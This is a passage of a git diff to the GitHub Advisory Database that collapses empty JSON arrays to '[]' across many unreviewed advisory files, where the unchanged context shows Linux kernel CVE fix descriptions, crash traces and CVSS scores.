+++ b/advisories/unreviewed/2024/03/GHSA-wf6g-6473-wm39/GHSA-wf6g-6473-wm39.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/03/GHSA-wpx2-5m9q-j3g7/GHSA-wpx2-5m9q-j3g7.json b/advisories/unreviewed/2024/03/GHSA-wpx2-5m9q-j3g7/GHSA-wpx2-5m9q-j3g7.json
index cc7b11511d8..ed911dc9a98 100644
--- a/advisories/unreviewed/2024/03/GHSA-wpx2-5m9q-j3g7/GHSA-wpx2-5m9q-j3g7.json
+++ b/advisories/unreviewed/2024/03/GHSA-wpx2-5m9q-j3g7/GHSA-wpx2-5m9q-j3g7.json
@@ -7,12 +7,8 @@
"CVE-2021-47061"
],
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: Destroy I/O bus devices on unregister failure _after_ sync'ing SRCU\n\nIf allocating a new instance of an I/O bus fails when unregistering a\ndevice, wait to destroy the device until after all readers are guaranteed\nto see the new null bus. Destroying devices before the bus is nullified\ncould lead to use-after-free since readers expect the devices on their\nreference of the bus to remain valid.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -36,9 +32,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/03/GHSA-x2mc-jwgp-h2fq/GHSA-x2mc-jwgp-h2fq.json b/advisories/unreviewed/2024/03/GHSA-x2mc-jwgp-h2fq/GHSA-x2mc-jwgp-h2fq.json
index 112b2006341..c33694da7bc 100644
--- a/advisories/unreviewed/2024/03/GHSA-x2mc-jwgp-h2fq/GHSA-x2mc-jwgp-h2fq.json
+++ b/advisories/unreviewed/2024/03/GHSA-x2mc-jwgp-h2fq/GHSA-x2mc-jwgp-h2fq.json
@@ -7,12 +7,8 @@
"CVE-2021-47055"
],
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nmtd: require write permissions for locking and badblock ioctls\n\nMEMLOCK, MEMUNLOCK and OTPLOCK modify protection bits. Thus require\nwrite permission. Depending on the hardware MEMLOCK might even be\nwrite-once, e.g. for SPI-NOR flashes with their WP# tied to GND. OTPLOCK\nis always write-once.\n\nMEMSETBADBLOCK modifies the bad block table.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -56,9 +52,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/04/GHSA-29f8-5v89-7j3x/GHSA-29f8-5v89-7j3x.json b/advisories/unreviewed/2024/04/GHSA-29f8-5v89-7j3x/GHSA-29f8-5v89-7j3x.json
index 47006fb0553..9b77ad6b7e0 100644
--- a/advisories/unreviewed/2024/04/GHSA-29f8-5v89-7j3x/GHSA-29f8-5v89-7j3x.json
+++ b/advisories/unreviewed/2024/04/GHSA-29f8-5v89-7j3x/GHSA-29f8-5v89-7j3x.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/04/GHSA-fpx7-mqrg-xrvx/GHSA-fpx7-mqrg-xrvx.json b/advisories/unreviewed/2024/04/GHSA-fpx7-mqrg-xrvx/GHSA-fpx7-mqrg-xrvx.json
index 13c35fb9f0e..5ca1109005a 100644
--- a/advisories/unreviewed/2024/04/GHSA-fpx7-mqrg-xrvx/GHSA-fpx7-mqrg-xrvx.json
+++ b/advisories/unreviewed/2024/04/GHSA-fpx7-mqrg-xrvx/GHSA-fpx7-mqrg-xrvx.json
@@ -17,9 +17,7 @@
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/05/GHSA-24vw-fq64-647q/GHSA-24vw-fq64-647q.json b/advisories/unreviewed/2024/05/GHSA-24vw-fq64-647q/GHSA-24vw-fq64-647q.json
index 8a438ccaa19..5d122b9c77a 100644
--- a/advisories/unreviewed/2024/05/GHSA-24vw-fq64-647q/GHSA-24vw-fq64-647q.json
+++ b/advisories/unreviewed/2024/05/GHSA-24vw-fq64-647q/GHSA-24vw-fq64-647q.json
@@ -7,12 +7,8 @@
"CVE-2021-47438"
],
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: Fix memory leak in mlx5_core_destroy_cq() error path\n\nPrior to this patch in case mlx5_core_destroy_cq() failed it returns\nwithout completing all destroy operations and that leads to memory leak.\nInstead, complete the destroy flow before return error.\n\nAlso move mlx5_debug_cq_remove() to the beginning of mlx5_core_destroy_cq()\nto be symmetrical with mlx5_core_create_cq().\n\nkmemleak complains on:\n\nunreferenced object 0xc000000038625100 (size 64):\n comm \"ethtool\", pid 28301, jiffies 4298062946 (age 785.380s)\n hex dump (first 32 bytes):\n 60 01 48 94 00 00 00 c0 b8 05 34 c3 00 00 00 c0 `.H.......4.....\n 02 00 00 00 00 00 00 00 00 db 7d c1 00 00 00 c0 ..........}.....\n backtrace:\n [<000000009e8643cb>] add_res_tree+0xd0/0x270 [mlx5_core]\n [<00000000e7cb8e6c>] mlx5_debug_cq_add+0x5c/0xc0 [mlx5_core]\n [<000000002a12918f>] mlx5_core_create_cq+0x1d0/0x2d0 [mlx5_core]\n [<00000000cef0a696>] mlx5e_create_cq+0x210/0x3f0 [mlx5_core]\n [<000000009c642c26>] mlx5e_open_cq+0xb4/0x130 [mlx5_core]\n [<0000000058dfa578>] mlx5e_ptp_open+0x7f4/0xe10 [mlx5_core]\n [<0000000081839561>] mlx5e_open_channels+0x9cc/0x13e0 [mlx5_core]\n [<0000000009cf05d4>] mlx5e_switch_priv_channels+0xa4/0x230\n[mlx5_core]\n [<0000000042bbedd8>] mlx5e_safe_switch_params+0x14c/0x300\n[mlx5_core]\n [<0000000004bc9db8>] set_pflag_tx_port_ts+0x9c/0x160 [mlx5_core]\n [<00000000a0553443>] mlx5e_set_priv_flags+0xd0/0x1b0 [mlx5_core]\n [<00000000a8f3d84b>] ethnl_set_privflags+0x234/0x2d0\n [<00000000fd27f27c>] genl_family_rcv_msg_doit+0x108/0x1d0\n [<00000000f495e2bb>] genl_family_rcv_msg+0xe4/0x1f0\n [<00000000646c5c2c>] genl_rcv_msg+0x78/0x120\n [<00000000d53e384e>] netlink_rcv_skb+0x74/0x1a0",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -32,9 +28,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/05/GHSA-3c5v-hp3x-r94q/GHSA-3c5v-hp3x-r94q.json b/advisories/unreviewed/2024/05/GHSA-3c5v-hp3x-r94q/GHSA-3c5v-hp3x-r94q.json
index 922e0960b53..2e02bb202a9 100644
--- a/advisories/unreviewed/2024/05/GHSA-3c5v-hp3x-r94q/GHSA-3c5v-hp3x-r94q.json
+++ b/advisories/unreviewed/2024/05/GHSA-3c5v-hp3x-r94q/GHSA-3c5v-hp3x-r94q.json
@@ -7,12 +7,8 @@
"CVE-2021-47435"
],
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndm: fix mempool NULL pointer race when completing IO\n\ndm_io_dec_pending() calls end_io_acct() first and will then dec md\nin-flight pending count. But if a task is swapping DM table at same\ntime this can result in a crash due to mempool->elements being NULL:\n\ntask1 task2\ndo_resume\n ->do_suspend\n ->dm_wait_for_completion\n bio_endio\n\t\t\t\t ->clone_endio\n\t\t\t\t ->dm_io_dec_pending\n\t\t\t\t ->end_io_acct\n\t\t\t\t ->wakeup task1\n ->dm_swap_table\n ->__bind\n ->__bind_mempools\n ->bioset_exit\n ->mempool_exit\n ->free_io\n\n[ 67.330330] Unable to handle kernel NULL pointer dereference at\nvirtual address 0000000000000000\n......\n[ 67.330494] pstate: 80400085 (Nzcv daIf +PAN -UAO)\n[ 67.330510] pc : mempool_free+0x70/0xa0\n[ 67.330515] lr : mempool_free+0x4c/0xa0\n[ 67.330520] sp : ffffff8008013b20\n[ 67.330524] x29: ffffff8008013b20 x28: 0000000000000004\n[ 67.330530] x27: ffffffa8c2ff40a0 x26: 00000000ffff1cc8\n[ 67.330535] x25: 0000000000000000 x24: ffffffdada34c800\n[ 67.330541] x23: 0000000000000000 x22: ffffffdada34c800\n[ 67.330547] x21: 00000000ffff1cc8 x20: ffffffd9a1304d80\n[ 67.330552] x19: ffffffdada34c970 x18: 000000b312625d9c\n[ 67.330558] x17: 00000000002dcfbf x16: 00000000000006dd\n[ 67.330563] x15: 000000000093b41e x14: 0000000000000010\n[ 67.330569] x13: 0000000000007f7a x12: 0000000034155555\n[ 67.330574] x11: 0000000000000001 x10: 0000000000000001\n[ 67.330579] x9 : 0000000000000000 x8 : 0000000000000000\n[ 67.330585] x7 : 0000000000000000 x6 : ffffff80148b5c1a\n[ 67.330590] x5 : ffffff8008013ae0 x4 : 0000000000000001\n[ 67.330596] x3 : ffffff80080139c8 x2 : ffffff801083bab8\n[ 67.330601] x1 : 0000000000000000 x0 : ffffffdada34c970\n[ 67.330609] Call trace:\n[ 67.330616] mempool_free+0x70/0xa0\n[ 67.330627] bio_put+0xf8/0x110\n[ 67.330638] dec_pending+0x13c/0x230\n[ 67.330644] clone_endio+0x90/0x180\n[ 67.330649] bio_endio+0x198/0x1b8\n[ 67.330655] dec_pending+0x190/0x230\n[ 67.330660] clone_endio+0x90/0x180\n[ 67.330665] bio_endio+0x198/0x1b8\n[ 67.330673] blk_update_request+0x214/0x428\n[ 67.330683] scsi_end_request+0x2c/0x300\n[ 67.330688] scsi_io_completion+0xa0/0x710\n[ 67.330695] scsi_finish_command+0xd8/0x110\n[ 67.330700] scsi_softirq_done+0x114/0x148\n[ 67.330708] blk_done_softirq+0x74/0xd0\n[ 67.330716] __do_softirq+0x18c/0x374\n[ 67.330724] irq_exit+0xb4/0xb8\n[ 67.330732] __handle_domain_irq+0x84/0xc0\n[ 67.330737] gic_handle_irq+0x148/0x1b0\n[ 67.330744] el1_irq+0xe8/0x190\n[ 67.330753] lpm_cpuidle_enter+0x4f8/0x538\n[ 67.330759] cpuidle_enter_state+0x1fc/0x398\n[ 67.330764] cpuidle_enter+0x18/0x20\n[ 67.330772] do_idle+0x1b4/0x290\n[ 67.330778] cpu_startup_entry+0x20/0x28\n[ 67.330786] secondary_start_kernel+0x160/0x170\n\nFix this by:\n1) Establishing pointers to 'struct dm_io' members in\ndm_io_dec_pending() so that they may be passed into end_io_acct()\n_after_ free_io() is called.\n2) Moving end_io_acct() after free_io().",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -48,9 +44,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/05/GHSA-3cpr-9mc9-3vfm/GHSA-3cpr-9mc9-3vfm.json b/advisories/unreviewed/2024/05/GHSA-3cpr-9mc9-3vfm/GHSA-3cpr-9mc9-3vfm.json
index cdad4cf495e..1485ebb8b3d 100644
--- a/advisories/unreviewed/2024/05/GHSA-3cpr-9mc9-3vfm/GHSA-3cpr-9mc9-3vfm.json
+++ b/advisories/unreviewed/2024/05/GHSA-3cpr-9mc9-3vfm/GHSA-3cpr-9mc9-3vfm.json
@@ -7,12 +7,8 @@
"CVE-2023-52830"
],
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: Fix double free in hci_conn_cleanup\n\nsyzbot reports a slab use-after-free in hci_conn_hash_flush [1].\nAfter releasing an object using hci_conn_del_sysfs in the\nhci_conn_cleanup function, releasing the same object again\nusing the hci_dev_put and hci_conn_put functions causes a double free.\nHere's a simplified flow:\n\nhci_conn_del_sysfs:\n hci_dev_put\n put_device\n kobject_put\n kref_put\n kobject_release\n kobject_cleanup\n kfree_const\n kfree(name)\n\nhci_dev_put:\n ...\n kfree(name)\n\nhci_conn_put:\n put_device\n ...\n kfree(name)\n\nThis patch drop the hci_dev_put and hci_conn_put function\ncall in hci_conn_cleanup function, because the object is\nfreed in hci_conn_del_sysfs function.\n\nThis patch also fixes the refcounting in hci_conn_add_sysfs() and\nhci_conn_del_sysfs() to take into account device_add() failures.\n\nThis fixes CVE-2023-28464.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -52,9 +48,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/05/GHSA-3pg2-q6q7-9rmm/GHSA-3pg2-q6q7-9rmm.json b/advisories/unreviewed/2024/05/GHSA-3pg2-q6q7-9rmm/GHSA-3pg2-q6q7-9rmm.json
index 132155ce09a..7896c17cb6d 100644
--- a/advisories/unreviewed/2024/05/GHSA-3pg2-q6q7-9rmm/GHSA-3pg2-q6q7-9rmm.json
+++ b/advisories/unreviewed/2024/05/GHSA-3pg2-q6q7-9rmm/GHSA-3pg2-q6q7-9rmm.json
@@ -7,12 +7,8 @@
"CVE-2021-47437"
],
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\niio: adis16475: fix deadlock on frequency set\n\nWith commit 39c024b51b560\n(\"iio: adis16475: improve sync scale mode handling\"), two deadlocks were\nintroduced:\n 1) The call to 'adis_write_reg_16()' was not changed to it's unlocked\n version.\n 2) The lock was not being released on the success path of the function.\n\nThis change fixes both these issues.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -28,9 +24,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/05/GHSA-4xwg-j5w5-pj88/GHSA-4xwg-j5w5-pj88.json b/advisories/unreviewed/2024/05/GHSA-4xwg-j5w5-pj88/GHSA-4xwg-j5w5-pj88.json
index 2d803e9870a..a25c44d16af 100644
--- a/advisories/unreviewed/2024/05/GHSA-4xwg-j5w5-pj88/GHSA-4xwg-j5w5-pj88.json
+++ b/advisories/unreviewed/2024/05/GHSA-4xwg-j5w5-pj88/GHSA-4xwg-j5w5-pj88.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -31,9 +29,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/05/GHSA-593h-749q-pv4x/GHSA-593h-749q-pv4x.json b/advisories/unreviewed/2024/05/GHSA-593h-749q-pv4x/GHSA-593h-749q-pv4x.json
index 9ed7512979a..aef7ef2a2e1 100644
--- a/advisories/unreviewed/2024/05/GHSA-593h-749q-pv4x/GHSA-593h-749q-pv4x.json
+++ b/advisories/unreviewed/2024/05/GHSA-593h-749q-pv4x/GHSA-593h-749q-pv4x.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -31,9 +29,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/05/GHSA-5g4g-hgmr-mqrx/GHSA-5g4g-hgmr-mqrx.json b/advisories/unreviewed/2024/05/GHSA-5g4g-hgmr-mqrx/GHSA-5g4g-hgmr-mqrx.json
index 61c6f615378..38f924ec1dd 100644
--- a/advisories/unreviewed/2024/05/GHSA-5g4g-hgmr-mqrx/GHSA-5g4g-hgmr-mqrx.json
+++ b/advisories/unreviewed/2024/05/GHSA-5g4g-hgmr-mqrx/GHSA-5g4g-hgmr-mqrx.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -55,9 +53,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/05/GHSA-5ggq-5m2f-79jm/GHSA-5ggq-5m2f-79jm.json b/advisories/unreviewed/2024/05/GHSA-5ggq-5m2f-79jm/GHSA-5ggq-5m2f-79jm.json
index efce3e7c9f9..c54919dd732 100644
--- a/advisories/unreviewed/2024/05/GHSA-5ggq-5m2f-79jm/GHSA-5ggq-5m2f-79jm.json
+++ b/advisories/unreviewed/2024/05/GHSA-5ggq-5m2f-79jm/GHSA-5ggq-5m2f-79jm.json
@@ -7,12 +7,8 @@
"CVE-2021-47434"
],
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nxhci: Fix command ring pointer corruption while aborting a command\n\nThe command ring pointer is located at [6:63] bits of the command\nring control register (CRCR). All the control bits like command stop,\nabort are located at [0:3] bits. While aborting a command, we read the\nCRCR and set the abort bit and write to the CRCR. The read will always\ngive command ring pointer as all zeros. So we essentially write only\nthe control bits. Since we split the 64 bit write into two 32 bit writes,\nthere is a possibility of xHC command ring stopped before the upper\ndword (all zeros) is written. If that happens, xHC updates the upper\ndword of its internal command ring pointer with all zeros. Next time,\nwhen the command ring is restarted, we see xHC memory access failures.\nFix this issue by only writing to the lower dword of CRCR where all\ncontrol bits are located.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -44,9 +40,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/05/GHSA-5m36-96vc-4fp6/GHSA-5m36-96vc-4fp6.json b/advisories/unreviewed/2024/05/GHSA-5m36-96vc-4fp6/GHSA-5m36-96vc-4fp6.json
index 28793e65e88..634a26c51af 100644
--- a/advisories/unreviewed/2024/05/GHSA-5m36-96vc-4fp6/GHSA-5m36-96vc-4fp6.json
+++ b/advisories/unreviewed/2024/05/GHSA-5m36-96vc-4fp6/GHSA-5m36-96vc-4fp6.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/05/GHSA-5mwv-x2qc-g5cj/GHSA-5mwv-x2qc-g5cj.json b/advisories/unreviewed/2024/05/GHSA-5mwv-x2qc-g5cj/GHSA-5mwv-x2qc-g5cj.json
index 55d67c94266..6d7932bc5b2 100644
--- a/advisories/unreviewed/2024/05/GHSA-5mwv-x2qc-g5cj/GHSA-5mwv-x2qc-g5cj.json
+++ b/advisories/unreviewed/2024/05/GHSA-5mwv-x2qc-g5cj/GHSA-5mwv-x2qc-g5cj.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -43,9 +41,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/05/GHSA-5p99-hcg9-j3m3/GHSA-5p99-hcg9-j3m3.json b/advisories/unreviewed/2024/05/GHSA-5p99-hcg9-j3m3/GHSA-5p99-hcg9-j3m3.json
index 223ea677276..911dde643a1 100644
--- a/advisories/unreviewed/2024/05/GHSA-5p99-hcg9-j3m3/GHSA-5p99-hcg9-j3m3.json
+++ b/advisories/unreviewed/2024/05/GHSA-5p99-hcg9-j3m3/GHSA-5p99-hcg9-j3m3.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/05/GHSA-62x6-4gmp-fg78/GHSA-62x6-4gmp-fg78.json b/advisories/unreviewed/2024/05/GHSA-62x6-4gmp-fg78/GHSA-62x6-4gmp-fg78.json
index ca8d5b5b058..618cd51ed22 100644
--- a/advisories/unreviewed/2024/05/GHSA-62x6-4gmp-fg78/GHSA-62x6-4gmp-fg78.json
+++ b/advisories/unreviewed/2024/05/GHSA-62x6-4gmp-fg78/GHSA-62x6-4gmp-fg78.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -55,9 +53,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/05/GHSA-6vq2-rrj2-6jjh/GHSA-6vq2-rrj2-6jjh.json b/advisories/unreviewed/2024/05/GHSA-6vq2-rrj2-6jjh/GHSA-6vq2-rrj2-6jjh.json
index 7b5d1460ee1..275dee86a0e 100644
--- a/advisories/unreviewed/2024/05/GHSA-6vq2-rrj2-6jjh/GHSA-6vq2-rrj2-6jjh.json
+++ b/advisories/unreviewed/2024/05/GHSA-6vq2-rrj2-6jjh/GHSA-6vq2-rrj2-6jjh.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -59,9 +57,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/05/GHSA-6whc-mw54-c55c/GHSA-6whc-mw54-c55c.json b/advisories/unreviewed/2024/05/GHSA-6whc-mw54-c55c/GHSA-6whc-mw54-c55c.json
index 198caffb2e6..b0ec490b914 100644
--- a/advisories/unreviewed/2024/05/GHSA-6whc-mw54-c55c/GHSA-6whc-mw54-c55c.json
+++ b/advisories/unreviewed/2024/05/GHSA-6whc-mw54-c55c/GHSA-6whc-mw54-c55c.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -31,9 +29,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/05/GHSA-6x3x-fg57-3vcm/GHSA-6x3x-fg57-3vcm.json b/advisories/unreviewed/2024/05/GHSA-6x3x-fg57-3vcm/GHSA-6x3x-fg57-3vcm.json
index 34c7e12c376..8db404d1739 100644
--- a/advisories/unreviewed/2024/05/GHSA-6x3x-fg57-3vcm/GHSA-6x3x-fg57-3vcm.json
+++ b/advisories/unreviewed/2024/05/GHSA-6x3x-fg57-3vcm/GHSA-6x3x-fg57-3vcm.json
@@ -7,12 +7,8 @@
"CVE-2021-47433"
],
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix abort logic in btrfs_replace_file_extents\n\nError injection testing uncovered a case where we'd end up with a\ncorrupt file system with a missing extent in the middle of a file. This\noccurs because the if statement to decide if we should abort is wrong.\n\nThe only way we would abort in this case is if we got a ret !=\n-EOPNOTSUPP and we called from the file clone code. However the\nprealloc code uses this path too. Instead we need to abort if there is\nan error, and the only error we _don't_ abort on is -EOPNOTSUPP and only\nif we came from the clone file code.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -32,9 +28,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/05/GHSA-6xwm-63wf-q2q3/GHSA-6xwm-63wf-q2q3.json b/advisories/unreviewed/2024/05/GHSA-6xwm-63wf-q2q3/GHSA-6xwm-63wf-q2q3.json
index 8c42fa5bf33..11bd33ef0f3 100644
--- a/advisories/unreviewed/2024/05/GHSA-6xwm-63wf-q2q3/GHSA-6xwm-63wf-q2q3.json
+++ b/advisories/unreviewed/2024/05/GHSA-6xwm-63wf-q2q3/GHSA-6xwm-63wf-q2q3.json
@@ -7,12 +7,8 @@
"CVE-2021-47436"
],
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: musb: dsps: Fix the probe error path\n\nCommit 7c75bde329d7 (\"usb: musb: musb_dsps: request_irq() after\ninitializing musb\") has inverted the calls to\ndsps_setup_optional_vbus_irq() and dsps_create_musb_pdev() without\nupdating correctly the error path. dsps_create_musb_pdev() allocates and\nregisters a new platform device which must be unregistered and freed\nwith platform_device_unregister(), and this is missing upon\ndsps_setup_optional_vbus_irq() error.\n\nWhile on the master branch it seems not to trigger any issue, I observed\na kernel crash because of a NULL pointer dereference with a v5.10.70\nstable kernel where the patch mentioned above was backported. With this\nkernel version, -EPROBE_DEFER is returned the first time\ndsps_setup_optional_vbus_irq() is called which triggers the probe to\nerror out without unregistering the platform device. Unfortunately, on\nthe Beagle Bone Black Wireless, the platform device still living in the\nsystem is being used by the USB Ethernet gadget driver, which during the\nboot phase triggers the crash.\n\nMy limited knowledge of the musb world prevents me to revert this commit\nwhich was sent to silence a robot warning which, as far as I understand,\ndoes not make sense. The goal of this patch was to prevent an IRQ to\nfire before the platform device being registered. I think this cannot\never happen due to the fact that enabling the interrupts is done by the\n->enable() callback of the platform musb device, and this platform\ndevice must be already registered in order for the core or any other\nuser to use this callback.\n\nHence, I decided to fix the error path, which might prevent future\nerrors on mainline kernels while also fixing older ones.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -44,9 +40,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/05/GHSA-7m8f-jj48-x349/GHSA-7m8f-jj48-x349.json b/advisories/unreviewed/2024/05/GHSA-7m8f-jj48-x349/GHSA-7m8f-jj48-x349.json
index 9c189686fbd..0ad95e393e1 100644
--- a/advisories/unreviewed/2024/05/GHSA-7m8f-jj48-x349/GHSA-7m8f-jj48-x349.json
+++ b/advisories/unreviewed/2024/05/GHSA-7m8f-jj48-x349/GHSA-7m8f-jj48-x349.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -31,9 +29,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/05/GHSA-7p9j-prv8-54xc/GHSA-7p9j-prv8-54xc.json b/advisories/unreviewed/2024/05/GHSA-7p9j-prv8-54xc/GHSA-7p9j-prv8-54xc.json
index a4520858d5e..1b504dd9aa6 100644
--- a/advisories/unreviewed/2024/05/GHSA-7p9j-prv8-54xc/GHSA-7p9j-prv8-54xc.json
+++ b/advisories/unreviewed/2024/05/GHSA-7p9j-prv8-54xc/GHSA-7p9j-prv8-54xc.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -31,9 +29,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/05/GHSA-8gv2-gcw7-7jwv/GHSA-8gv2-gcw7-7jwv.json b/advisories/unreviewed/2024/05/GHSA-8gv2-gcw7-7jwv/GHSA-8gv2-gcw7-7jwv.json
